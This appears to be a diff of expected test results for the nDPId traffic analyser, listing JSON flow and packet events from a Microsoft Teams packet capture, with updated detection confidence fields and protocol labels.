-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1587041682129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1587041682129,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIVE8AAP8R4\/3AqAEGwKgBAcFqADUANJ5TmvIBAAABAAAAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1587041682143,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"ts_msec":1587041682143,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC+wIdAADkR\/U\/AqAEBwKgBBgA1wWoAqgAAmvKBgAABAAQAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAs5ACEGY29uZmlnBXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAOAAFAAEAAAALAB8MY29uZmlnLXRlYW1zBnMtMDAwNQhzLW1zZWRnZcBUwGUABQABAAAAOgACwHLAcgABAAEAAABoAAQ0ccKE"}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01191{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}}
+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1587041682355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1587041682355,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPcIEAAP8Rx8TAqAEGwKgBAf9rADUAOydaEDoBAAABAAAAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1587041682370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1587041682370,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdUKtAADkRbU3AqAEBwKgBBgA1\/2sAiQAAEDqBgAABAAIAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQABwAwABQABAAAA5AAyEW5vcnRoZXVyb3BlY25zLTMyC25vcnRoZXVyb3BlCGNsb3VkYXBwBWF6dXJlA2NvbQDAPwABAAEAAAAEAAQ0ckww"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"}
